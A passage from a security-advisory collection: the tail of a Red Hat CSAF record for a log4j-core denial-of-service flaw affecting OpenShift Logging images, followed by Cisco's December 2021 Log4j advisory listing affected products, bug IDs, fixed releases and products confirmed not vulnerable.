"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x",
"8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
cisco-sa-apache-log4j-qruknebd
Vulnerability from csaf_cisco
Published
2021-12-10 18:45
Modified
2022-01-31 21:16
Summary
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Notes
Summary
Critical Vulnerabilities in Apache Log4j Java Logging Library
On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:
CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack
On December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:
CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation
On December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was disclosed:
CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration
For a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities ["https://logging.apache.org/log4j/2.x/security.html"] page.
Cisco's Response to These Vulnerabilities
Cisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 ["https://www.snort.org/advisories/talos-rules-2021-12-21"]
Product fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.
Cisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities.
Cisco's standard practice is to update integrated third-party software components to later versions as they become available.
Affected Products
Cisco investigated its product line to determine which products may be affected by these vulnerabilities.
This advisory only lists Cisco products and services that are known to include the impacted software component and thus may be vulnerable. Products and services that do not contain the impacted software component are not vulnerable and therefore are not listed in this advisory. Any Cisco product or service that is not explicitly listed in the Affected Products section of this advisory is not affected by the vulnerability or vulnerabilities described.
The Vulnerable Products ["#vp"] section includes Cisco bug IDs for each affected product. The bugs are accessible through the Cisco Bug Search Tool and contain additional platform-specific information, including workarounds (if available) and fixed software releases.
Vulnerable Products
Cisco investigated its product line to determine which products may be affected by these vulnerabilities.
The following table lists Cisco products that are affected by one or both of the vulnerabilities that are described in this advisory. Customers should refer to the associated Cisco bug(s) for further details.
Product Cisco Bug ID Fixed Release Availability ["https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#fixes"] Collaboration and Social Media Cisco Webex Meetings Server CSCwa47283 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47283"] CWMS-3.0MR4SP3 patch (21 Dec 2021)
CWMS-4.0MR4SP3 patch (21 Dec 2021)
CWMS-3.0MR4SP2 patch (14 Dec 2021)
CWMS-4.0MR4SP2 patch (14 Dec 2021) Endpoint Clients and Client Software Cisco CX Cloud Agent Software CSCwa47272 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47272"] 1.12.2 (17 Dec 2021) Network Application, Service, and Acceleration Cisco Call Studio CSCwa54008 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54008"] 11.6(2) (23 Dec 2021)
12.0(1) (23 Dec 2021)
12.5(1) (23 Dec 2021)
12.6(1) (23 Dec 2021) Cisco Nexus Insights CSCwa47284 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47284"] 6.0.2 (17 Dec 2021) Network and Content Security Devices Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM) CSCwa46963 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46963"] 6.2.3 hotfix (Available)
6.4.0 hotfix (Available)
6.6.5 hotfix (Available)
6.7.0 hotfix (Available)
7.0.1 hotfix (Available)
7.1.0 hotfix (Available) Cisco Identity Services Engine (ISE) CSCwa47133 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47133"] 2.4 hotfix (15 Dec 2021)
2.6 hotfix (15 Dec 2021)
2.7 hotfix (15 Dec 2021)
3.0 hotfix (15 Dec 2021)
3.1 hotfix (17 Dec 2021) Network Management and Provisioning Cisco Application Policy Infrastructure Controller (APIC) - Network Insights Base App CSCwa47295 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47295"] 4.2(7r) (Available)
5.2(3g) (Available) Cisco Automated Subsea Tuning CSCwa48806 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48806"] 2.1.0.4 (22 Dec 2021) Cisco Business Process Automation CSCwa47269 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47269"] 3.0.000.115 (patch) (17 Dec 2021)
3.1.000.044 (patch) (17 Dec 2021)
3.2.000.009 (patch) (17 Dec 2021) Cisco CloudCenter Cost Optimizer CSCwa48074 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48074"] 5.5.2 (Available) Cisco CloudCenter Suite Admin CSCwa47349 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47349"] 5.3.1 (Available) Cisco CloudCenter Workload Manager CSCwa47350 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47350"] 5.5.2 (Available) Cisco CloudCenter CSCwa48832 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48832"] 4.10.0.16 (22 Dec 2021) Cisco Common Services Platform Collector (CSPC) CSCwa47271 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47271"] 2.10.0.1 hotfix (Available)
2.9.1.3 hotfix (Available) Cisco Crosswork Data Gateway CSCwa47257 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47257"] 2.0.2 patch (21 Dec 2021)
3.0.1 patch (21 Dec 2021) Cisco Crosswork Network Controller CSCwa49936 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49936"] 2.0.1 patch (22 Dec 2021)
3.0.1 patch (22 Dec 2021) Cisco Crosswork Optimization Engine CSCwa49939 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49939"] 2.0.1 patch (21 Dec 2021)
3.0.1 patch (21 Dec 2021) Cisco Crosswork Platform Infrastructure CSCwa47367 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47367"] 4.0.1 patch (22 Dec 2021)
4.1.1 patch (22 Dec 2021) Cisco Crosswork Situation Manager CSCwa51878 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51878"] 8.0.0.8 patch (21 Dec 2021) Cisco Crosswork Zero Touch Provisioning (ZTP) CSCwa47259 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47259"] 2.0.1 patch (21 Dec 2021)
3.0.1 patch (21 Dec 2021) Cisco Cyber Vision Sensor Management Extension CSCwa49482 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49482"] 4.0.3 (22 Dec 2021) Cisco DNA Spaces Connector CSCwa47320 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47320"] v2.0.588 (Available)
v2.2.12 (Available) Cisco Data Center Network Manager (DCNM) CSCwa47291 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47291"] 12.0(2f) (Available)
11.5(3) patch (Available)
11.5(2) patch (Available)
11.5(1) patch (Available)
11.4(1) patch (Available)
11.3(1) patch (Available) Cisco Evolved Programmable Network Manager CSCwa47310 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47310"] 5.1.3.1 patch (22 Dec 2021)
5.0.2.1 patch (13 Jan 2022)
4.1.1.1 patch (13 Jan 2022) Cisco Intersight Virtual Appliance CSCwa47304 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47304"] 1.0.9-361 (20 Dec 2021) Cisco Network Services Orchestrator (NSO) CSCwa47342 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47342"] nso-5.3.5.1 (17 Dec 2021)
nso-5.4.5.2 (17 Dec 2021)
nso-5.5.4.1 (17 Dec 2021)
nso-5.6.3.1 (17 Dec 2021) Cisco Nexus Dashboard, formerly Cisco Application Services Engine CSCwa47299 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47299"] 2.1.2 (23 Dec 2021) Cisco Prime Service Catalog CSCwa47347 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47347"] 12.1 patch (20 Dec 2021) Cisco Secure Agile Exchange (SAE) Core Function Pack CSCwa52921 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52921"] 2.4.1 (14 Jan 2022) Cisco Smart PHY CSCwa50021 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50021"] 3.1.4 patch (Available)
3.2.0 patch (Available)
3.2.1 patch (Available)
21.3 patch (21 Jan 2022) Cisco Virtual Topology System (VTS) CSCwa47334 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47334"] 2.6.7 (22 Dec 2021) Cisco Virtualized Infrastructure Manager CSCwa49924 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49924"] 3.2.x patch (17 Dec 2021)
3.4.4 patch (17 Dec 2021)
3.4.6 patch (17 Dec 2021)
4.2.0 patch (17 Dec 2021)
4.2.1 patch (17 Dec 2021) Cisco WAN Automation Engine (WAE) CSCwa47369 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47369"] 7.5.0.1 (22 Dec 2021)
7.4.0.1 (28 Jan 2022)
7.3.0.2 (28 Jan 2022) Routing and Switching - Enterprise and Service Provider Cisco DNA Center CSCwa47322 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47322"] 2.2.2.8 patch (Available)
2.1.2.8 patch (Available)
2.2.3.4 patch (Available) Cisco IOx Fog Director CSCwa47370 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47370"] 1.14.5 patch (16 Dec 2021)
1.16.4 patch (Available) Cisco Network Assurance Engine CSCwa47285 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47285"] 6.0.2 (23 Dec 2021) Cisco Network Convergence System 1004 CSCwa52235 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52235"] 7.3.2 SMU/GISO (14 Jan 2022)
7.3.1 SMU (21 Jan 2022) Cisco Optical Network Controller CSCwa48793 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48793"] 1.1.0 (22 Dec 2021) Cisco SD-WAN vManage CSCwa47745 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47745"] 20.3.4.1 (Available)
20.6.2.1 (Available)
20.5.1.1 (Available)
20.4.2.1 (Available) Unified Computing Cisco Integrated Management Controller (IMC) Supervisor CSCwa47307 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47307"] 2.3.2.1 (23 Dec 2021) Cisco UCS Central Software CSCwa47303 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47303"] 2.0(1p) (22 Dec 2021) Cisco UCS Director CSCwa47288 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288"] 6.8.2.0 (23 Dec 2021) Cisco Workload Optimization Manager CSCwa50220 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50220"] 3.2.1 patch (Available) Voice and Unified Communications Devices Cisco BroadWorks CSCwa47315 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47315"] 2021.11_1.162 (13 Dec 2021)
ap381882 (15 Dec 2021) Cisco Cloud Connect CSCwa51545 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51545"] 12.6(1) (Available) Cisco Contact Center Domain Manager (CCDM) CSCwa47383 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383"] 12.5(1) ES6 (Available)
12.6(1) ES3 (Available) Cisco Contact Center Management Portal (CCMP) CSCwa47383 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383"] 12.5(1) ES6 (Available)
12.6(1) ES3 (Available) Cisco Emergency Responder CSCwa47391 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47391"] 11.5(4)SU9 patch (16 Dec 2021)
11.5(4)SU10 patch (16 Dec 2021) Cisco Enterprise Chat and Email CSCwa47392 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47392"] 12.0(1) patch (Available)
12.5 (1) patch (Available)
12.6(1) patch (Available) Cisco Finesse CSCwa46459 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46459"] 12.6(1)ES03 (23 Dec 2021) Cisco Packaged Contact Center Enterprise CSCwa47274 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47274"] 11.6(2) (Available)
12.0(1) (Available)
12.5(1) (Available)
12.6(1) (Available) Cisco Paging Server CSCwa47395 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47395"] 14.4.2 (21 Dec 2021) Cisco Unified Communications Manager / Cisco Unified Communications Manager Session Management Edition CSCwa47249 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47249"] 11.5(1)SU7 patch (16 Dec 2021)
11.5(1)SU8 patch (16 Dec 2021)
11.5(1)SU9 patch (16 Dec 2021)
11.5(1)SU10 patch (16 Dec 2021)
11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Unified Communications Manager IM &Presence Service CSCwa47393 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47393"] 11.5(1)SU7 patch (16 Dec 2021)
11.5(1)SU8 patch (16 Dec 2021)
11.5(1)SU9 patch (16 Dec 2021)
11.5(1)SU10 patch (16 Dec 2021)
11.5(1.18900-16) patch (16 Dec 2021)
11.5(1.18901-3) patch (16 Dec 2021) Cisco Unified Contact Center Enterprise - Live Data server CSCwa46810 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46810"] 11.6(1)ES23 (23 Dec 2021)
12.0(1)ES18 (23 Dec 2021)
12.5(1)ES13 (23 Dec 2021)
12.6(1)ES03 (23 Dec 2021) Cisco Unified Contact Center Enterprise CSCwa47273 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47273"] 11.6(2) (Available)
12.0(1) (Available)
12.5(1) (Available)
12.6(1) (Available) Cisco Unified Contact Center Express CSCwa47388 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47388"] 12.5(1)SU1 (23 Dec 2021) Cisco Unified Customer Voice Portal CSCwa47275 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47275"] 11.6(2) (Available)
12.0(1) (Available)
12.5(1) (Available)
12.6(1) (23 Dec 2021) Cisco Unified Intelligence Center CSCwa46525 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46525"] 12.6(1) (23 Dec 2021) Cisco Unified SIP Proxy Software CSCwa47265 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47265"] 10.2.1v2 patch (23 Dec 2021) Cisco Unity Connection CSCwa47387 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47387"] 11.5(1)SU7 patch (16 Dec 2021)
11.5(1)SU8 patch (16 Dec 2021)
11.5(1)SU9 patch (16 Dec 2021)
11.5(1)SU10 patch (16 Dec 2021)
11.5(1.18119-2) through 11.5(1.23162-1) patch (16 Dec 2021) Cisco Virtualized Voice Browser CSCwa47397 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47397"] 12.5(1) (Available)
12.6(1) (23 Dec 2021) Cisco Webex Workforce Optimization CSCwa51476 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51476"] Product is End of Software Maintenance - No Fixes Planned Video, Streaming, TelePresence, and Transcoding Devices Cisco Video Surveillance Operations Manager CSCwa47360 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47360"] 7.14.4 patch (Available) Cisco Vision Dynamic Signage Director CSCwa47351 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47351"] Contact Cisco TAC for a patch
6.4 SP3 (17 Jan 2021) Wireless Cisco Connected Mobile Experiences (CMX) CSCwa47312 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47312"] 10.6.3-70 patch (Available)
10.6.3-105 patch (Available)
10.6.2-89 patch (Available)
10.4.1 patch (Available)
Products Confirmed Not Vulnerable
Cisco investigated its product line to determine which products may be affected by these vulnerabilities.
Any product not listed in the Products Under Investigation or Vulnerable Products section of this advisory is to be considered not vulnerable.
Cisco has confirmed that these vulnerabilities do not affect the following Cisco products:
Cable Devices
Cisco GS7000 Nodes
Cisco RF Gateway Series
Cisco Remote PHY 120
Collaboration and Social Media
Cisco SocialMiner
Endpoint Clients and Client Software
Cisco AnyConnect Secure Mobility Client
Cisco Jabber Guest
Cisco Jabber
Cisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints
Cisco Webex App
Meraki Products
Cisco Meraki Go Series
Cisco Meraki MR Series Cloud-Managed Wireless Access Points
Cisco Meraki MS Series Switches
Cisco Meraki MT Series Sensors
Cisco Meraki MV Series Cloud-Managed Smart Cameras
Cisco Meraki MX Series Cloud-Managed Security and SD-WAN
Cisco Meraki Systems Manager (SM)
Cisco Meraki Z-Series Cloud-Managed Teleworker Gateway
Network Application, Service, and Acceleration
Cisco Cloud Services Platform 2100
Cisco Cloud Services Platform 5000 Series
Cisco Nexus Dashboard Data Broker
Cisco Tetration Analytics
Cisco Wide Area Application Services (WAAS)
ConfD
Network and Content Security Devices
Cisco AMP Virtual Private Cloud Appliance
Cisco Adaptive Security Appliance (ASA) Software
Cisco Adaptive Security Device Manager
Cisco Adaptive Security Virtual Appliance (ASAv)
Cisco Advanced Web Security Reporting Application
Cisco Email Security Appliance (ESA)
Cisco FXOS Firepower Chassis Manager
Cisco Firepower Management Center
Cisco Firepower Next-Generation Intrusion Prevention System (NGIPS)
Cisco Firepower Threat Defense (FTD) managed by Cisco Firepower Management Center
Cisco Secure Email Encryption Add-in
Cisco Secure Email Encryption Plugin for Outlook
Cisco Secure Email Security Plugin for Outlook
Cisco Secure Email and Web Manager, formerly Cisco Content Security Management Appliance (SMA)
Cisco Secure Network Analytics, formerly Stealthwatch Enterprise, Advanced Host Group Automation (AHGA)
Cisco Secure Network Analytics, formerly Stealthwatch Enterprise, Flow Adapter
Cisco Secure Network Analytics, formerly Stealthwatch Enterprise, Network Forensics Automation (NFA)
Cisco Secure Network Analytics, formerly Stealthwatch Enterprise, Proxy Adapter
Cisco Secure Network Analytics, formerly Stealthwatch
Cisco Secure Services Proxy (CSSP)
Cisco Security Malware Analytics Appliance, formerly Cisco Threat Grid Appliance
Cisco Security Manager
Cisco Web Security Appliance (WSA)
Network Management and Provisioning
Cisco ACI Multi-Site Orchestrator
Cisco CloudCenter Action Orchestrator
Cisco Connected Grid Device Manager
Cisco Container Platform
Cisco Crosswork Change Automation
Cisco Crosswork Health Insights
Cisco Crosswork Service Health
Cisco Elastic Services Controller (ESC)
Cisco Intelligent Node (iNode) Manager
Cisco Intersight Mobile App
Cisco IoT Field Network Director, formerly Cisco Connected Grid Network Management System
Cisco Modeling Labs
Cisco NCS 2000 Shelf Virtualization Orchestrator
Cisco Optical Network Planner
Cisco Policy Suite
Cisco Prime Access Registrar
Cisco Prime Cable Provisioning
Cisco Prime Central for Service Providers
Cisco Prime Collaboration Assurance
Cisco Prime Collaboration Deployment
Cisco Prime Collaboration Provisioning
Cisco Prime IP Express
Cisco Prime Infrastructure
Cisco Prime License Manager
Cisco Prime Network Registrar
Cisco Prime Network
Cisco Prime Optical for Service Providers
Cisco Prime Performance Manager
Cisco Prime Provisioning
Cisco Process Orchestrator
Cisco Smart Software Manager On-Prem
Cisco Telemetry Broker
Routing and Switching - Enterprise and Service Provider
Cisco ACI Virtual Edge
Cisco ASR 5000 Series Routers
Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM)
Cisco Enterprise NFV Infrastructure Software (NFVIS)
Cisco GGSN Gateway GPRS Support Node
Cisco IOS XR Software
Cisco IOS and IOS XE Software
Cisco IP Services Gateway (IPSG)
Cisco MDS 9000 Series Multilayer Switches
Cisco MME Mobility Management Entity
Cisco Mobility Unified Reporting and Analytics System
Cisco Network Convergence System 2000 Series
Cisco Nexus 3000 Series Switches
Cisco Nexus 5500 Platform Switches
Cisco Nexus 5600 Platform Switches
Cisco Nexus 6000 Series Switches
Cisco Nexus 7000 Series Switches
Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode
Cisco Nexus 9000 Series Switches in standalone NX-OS mode
Cisco ONS 15454 Series Multiservice Provisioning Platforms
Cisco PDSN/HA Packet Data Serving Node and Home Agent
Cisco PGW Packet Data Network Gateway
Cisco SD-WAN vBond Controller Software
Cisco SD-WAN vEdge 100 Series Routers
Cisco SD-WAN vEdge 1000 Series Routers
Cisco SD-WAN vEdge 2000 Series Routers
Cisco SD-WAN vEdge 5000 Series Routers
Cisco SD-WAN vEdge Cloud Router Platform
Cisco SD-WAN vSmart Controller Software
Cisco System Architecture Evolution Gateway (SAEGW)
Cisco Ultra Cloud Core - Access and Mobility Management Function
Cisco Ultra Cloud Core - Policy Control Function
Cisco Ultra Cloud Core - Redundancy Configuration Manager
Cisco Ultra Cloud Core - Session Management Function
Cisco Ultra Cloud Core - Subscriber Microservices Infrastructure
Cisco Ultra Packet Core
Cisco Ultra Services Platform
Routing and Switching - Small Business
Cisco 220 Series Smart Plus Switches
Cisco 250 Series Smart Switches
Cisco 350 Series Managed Switches
Cisco 550 Series Stackable Managed Switches
Cisco Business 220 Series Smart Switches
Cisco Business 250 Series Smart Switches
Cisco Business 350 Series Managed Switches
Cisco Business Dashboard
Cisco RV110W Wireless-N VPN Firewall
Cisco RV130 VPN Router
Cisco RV130W Wireless-N Multifunction VPN Router
Cisco RV132W ADSL2+ Wireless-N VPN Router
Cisco RV134W VDSL2 Wireless-AC VPN Router
Cisco RV160 VPN Router
Cisco RV160W Wireless-AC VPN Router
Cisco RV215W Wireless-N VPN Router
Cisco RV260 VPN Routers
Cisco RV260P VPN Router with PoE
Cisco RV260W Wireless-AC VPN Router
Cisco RV320 Dual Gigabit WAN VPN Router
Cisco RV325 Dual Gigabit WAN VPN Router
Cisco RV340 Dual WAN Gigabit VPN Router
Cisco RV340W Dual WAN Gigabit Wireless-AC VPN Router
Cisco RV345 Dual WAN Gigabit VPN Router
